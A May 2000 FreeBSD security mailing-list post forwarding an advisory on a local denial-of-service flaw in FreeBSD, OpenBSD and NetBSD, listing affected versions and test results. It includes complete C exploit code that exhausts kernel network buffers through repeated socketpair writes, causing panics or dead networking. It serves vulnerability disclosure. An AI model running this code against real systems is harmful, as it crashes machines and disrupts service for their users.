From owner-freebsd-security  Tue May 30  1:40:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from Athena.za.net (athena.za.net [196.30.167.200])
	by hub.freebsd.org (Postfix) with ESMTP id D125837B90B
	for <freebsd-security@freebsd.org>; Tue, 30 May 2000 01:40:40 -0700 (PDT)
	(envelope-from jus@security.za.net)
Received: from localhost (jus@localhost)
	by Athena.za.net (8.9.3/8.9.3) with ESMTP id KAA00271
	for <freebsd-security@freebsd.org>; Tue, 30 May 2000 10:39:51 +0200 (SAST)
	(envelope-from jus@security.za.net)
X-Authentication-Warning: Athena.za.net: jus owned process doing -bs
Date: Tue, 30 May 2000 10:39:51 +0200 (SAST)
From: Justin Stanford <jus@security.za.net>
X-Sender: jus@Athena.za.net
To: freebsd-security@freebsd.org
Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Message-ID: <Pine.BSF.4.21.0005301039330.259-100000@Athena.za.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Tested aswell on 3.4-STABLE and 4.0-STABLE - it works.

--
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions


---------- Forwarded message ----------
Date: Mon, 29 May 2000 09:05:23 -0500 (CDT)
From: Vacuum <vacuum@technotronic.com>
To: news@technotronic.com
Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability

Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability


Release Date:
April 29, 2000

Systems Affected:
FreeBSD 3.3-RELEASE
FreeBSD 4.0-RELEASE
FreeBSD 5.0 (maybe)
Openbsd 2.5
Openbsd 2.6
Openbsd 2.7 (maybe)
NetBSD  1.4.1
NetBSD  1.4.2 (maybe) 


THE PROBLEM

From an original posting made about last September by Sven Berkenvs 
(sven@ILSE.NL) to bugtraq:


--- Forward ---

I stumbled across a denial of service attack on FreeBSD systems,
where
an unpriviledged user can panic the kernel. Quick and dirty testing
(code attached at the end of this mail) showed OpenBSD is vulnerable
too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
test it on older FreeBSD versions.
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with
NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to
send
something over the network get stuck waiting in mbuf. Locally the
system
continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected
code
in OpenBSD is from its parent NetBSD.

--- End of Forward ---

Upon testing this code on the new versions of *bsd the exploit still
works.

FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs
	recieves /kernel: xl0: no memory for rx list -- packet dropped!
	All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full
Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full
Openbsd - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase
NMBCLUS
	The network connection is dead.
NetBSD - 1.4.2: Untested

From what I have tested on, Linux does not have any issue with
this piece of code. As for the other unices, they have not been
tested.

THE CODE

The original code written by Sven Berkenvs that causes this:

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}


Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c
h
http://www.ussrback.com

------------ Output from pgp ------------
Opening file "/dev/null" type text.
Opening file "/home/jus/pgp4pine.tmp" type binary.
Signature by unknown keyid: 0x8D8FA0C3
Opening file "/dev/null" type text.




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message